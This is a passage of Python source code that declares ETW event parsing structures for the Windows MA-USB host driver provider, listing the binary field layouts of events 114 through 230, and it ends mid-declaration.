@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=114, version=0)
class Microsoft_Windows_USB_MAUSBHOST_114_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_Length" / Int16ul,
"fid_MaUsbStatus" / Int32ul,
"fid_AckRequest" / Int8ul,
"fid_NegativeCredit" / Int8ul,
"fid_EndOfTransfer" / Int8ul,
"fid_NumberOfIsochHeaders" / Int16ul,
"fid_MTDValid" / Int8ul,
"fid_ASAPDelivery" / Int8ul,
"fid_PresentationTime" / Int32ul,
"fid_NumberOfIsochSegments" / Int16ul,
"fid_NominalBusInterval" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=115, version=0)
class Microsoft_Windows_USB_MAUSBHOST_115_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_EndpointHandle" / Int16ul,
"fid_TransferType" / Int32ul,
"fid_TransferDirection" / Int32ul,
"fid_RequestId" / Int8ul,
"fid_SequenceNumber" / Int32ul,
"fid_Length" / Int16ul,
"fid_MaUsbStatus" / Int32ul,
"fid_AckRequest" / Int8ul,
"fid_NegativeCredit" / Int8ul,
"fid_EndOfTransfer" / Int8ul,
"fid_NumberOfIsochHeaders" / Int16ul,
"fid_MTDValid" / Int8ul,
"fid_ASAPDelivery" / Int8ul,
"fid_PresentationTime" / Int32ul,
"fid_NumberOfIsochSegments" / Int16ul,
"fid_NominalBusInterval" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=116, version=0)
class Microsoft_Windows_USB_MAUSBHOST_116_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_PortNumber" / Int16ul,
"fid_RemotePortNumber" / Int16ul,
"fid_IsUdp" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=117, version=0)
class Microsoft_Windows_USB_MAUSBHOST_117_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_PortNumber" / Int16ul,
"fid_RemotePortNumber" / Int16ul,
"fid_IsUdp" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=118, version=0)
class Microsoft_Windows_USB_MAUSBHOST_118_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_UsbDevice" / Int64ul,
"fid_Endpoint" / Int64ul,
"fid_USB_Endpoint_Descriptor" / Float32l,
"fid_IsLinkManaged" / Int8ul,
"fid_CreditConsumptionUnit" / Int16ul,
"fid_BufferSize" / Int32ul,
"fid_IsochProgrammingDelay" / Int16ul,
"fid_IsochResponseDelay" / Int16ul,
"fid_IsochSegmentsPerFrame" / Int32ul,
"fid_MaxIsochSegmentSize" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=119, version=0)
class Microsoft_Windows_USB_MAUSBHOST_119_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Speed_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=120, version=0)
class Microsoft_Windows_USB_MAUSBHOST_120_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_P_Out_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=121, version=0)
class Microsoft_Windows_USB_MAUSBHOST_121_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Speed_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=122, version=0)
class Microsoft_Windows_USB_MAUSBHOST_122_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Synch_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=123, version=0)
class Microsoft_Windows_USB_MAUSBHOST_123_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Container_Id_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=124, version=0)
class Microsoft_Windows_USB_MAUSBHOST_124_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_MAUSB_Device_Link_Sleep_Capability_Descriptor" / CString
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=125, version=0)
class Microsoft_Windows_USB_MAUSBHOST_125_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_NumberOfEndpoints" / Int16ul,
"fid_NumberOfDevices" / Int8ul,
"fid_NumberOfStreams" / Int8ul,
"fid_DeviceType" / Int8ul,
"fid_MaxOutstandingTransferRequests" / Int16ul,
"fid_MaxOutstandingManagementRequests" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=201, version=0)
class Microsoft_Windows_USB_MAUSBHOST_201_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_ResponseTimeout" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=202, version=0)
class Microsoft_Windows_USB_MAUSBHOST_202_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=203, version=0)
class Microsoft_Windows_USB_MAUSBHOST_203_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_RouteStringPort1" / Int8ul,
"fid_RouteStringPort2" / Int8ul,
"fid_RouteStringPort3" / Int8ul,
"fid_RouteStringPort4" / Int8ul,
"fid_RouteStringPort5" / Int8ul,
"fid_USBSpeed" / Int8ul,
"fid_HubDeviceHandle" / Int16ul,
"fid_ParentHSHubDeviceHandle" / Int16ul,
"fid_ParentHSHubPort" / Int8ul,
"fid_MTT" / Int8ul,
"fid_LaneSpeedExponent" / Int8ul,
"fid_SublinkType" / Int8ul,
"fid_LaneCount" / Int8ul,
"fid_LinkProtocol" / Int8ul,
"fid_LaneSpeedMantissa" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=204, version=0)
class Microsoft_Windows_USB_MAUSBHOST_204_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=205, version=0)
class Microsoft_Windows_USB_MAUSBHOST_205_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=206, version=0)
class Microsoft_Windows_USB_MAUSBHOST_206_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_USBDeviceHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=207, version=0)
class Microsoft_Windows_USB_MAUSBHOST_207_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=208, version=0)
class Microsoft_Windows_USB_MAUSBHOST_208_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_EP0Handle" / Int16ul,
"fid_MaxPacketSize" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=209, version=0)
class Microsoft_Windows_USB_MAUSBHOST_209_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=210, version=0)
class Microsoft_Windows_USB_MAUSBHOST_210_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesToInactivate" / Int8ul,
"fid_SuspendFlag" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=211, version=0)
class Microsoft_Windows_USB_MAUSBHOST_211_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=212, version=0)
class Microsoft_Windows_USB_MAUSBHOST_212_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_UpdateDevReqFields" / Int32ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=213, version=0)
class Microsoft_Windows_USB_MAUSBHOST_213_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=214, version=0)
class Microsoft_Windows_USB_MAUSBHOST_214_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesWithError" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=215, version=0)
class Microsoft_Windows_USB_MAUSBHOST_215_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesToDelete" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=216, version=0)
class Microsoft_Windows_USB_MAUSBHOST_216_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesWithError" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=217, version=0)
class Microsoft_Windows_USB_MAUSBHOST_217_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEPHandlesWithError" / Int8ul,
"fid_EPHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=218, version=0)
class Microsoft_Windows_USB_MAUSBHOST_218_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=219, version=0)
class Microsoft_Windows_USB_MAUSBHOST_219_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=220, version=0)
class Microsoft_Windows_USB_MAUSBHOST_220_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEPResetInformationBlocks" / Int8ul,
"fid_EPHandle" / Int16ul,
"fid_TransferStatePreserve" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=221, version=0)
class Microsoft_Windows_USB_MAUSBHOST_221_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=222, version=0)
class Microsoft_Windows_USB_MAUSBHOST_222_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=223, version=0)
class Microsoft_Windows_USB_MAUSBHOST_223_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_UsbDeviceAddress" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=224, version=0)
class Microsoft_Windows_USB_MAUSBHOST_224_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpDescriptors" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=225, version=0)
class Microsoft_Windows_USB_MAUSBHOST_225_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEndpoints" / Int16ul,
"fid_NumberOfDevices" / Int8ul,
"fid_NumberOfStreams" / Int8ul,
"fid_DeviceType" / Int8ul,
"fid_DescriptorCount" / Int8ul,
"fid_DescriptorLength" / Int32ul,
"fid_MaxOutstandingTransferRequests" / Int16ul,
"fid_MaxOutstandingManagementRequests" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=226, version=0)
class Microsoft_Windows_USB_MAUSBHOST_226_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=227, version=0)
class Microsoft_Windows_USB_MAUSBHOST_227_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesWithError" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=228, version=0)
class Microsoft_Windows_USB_MAUSBHOST_228_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=229, version=0)
class Microsoft_Windows_USB_MAUSBHOST_229_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_EP0Handle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=230, version=0)
class Microsoft_Windows_USB_MAUSBHOST_230_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpDescriptors" / Int8ul,
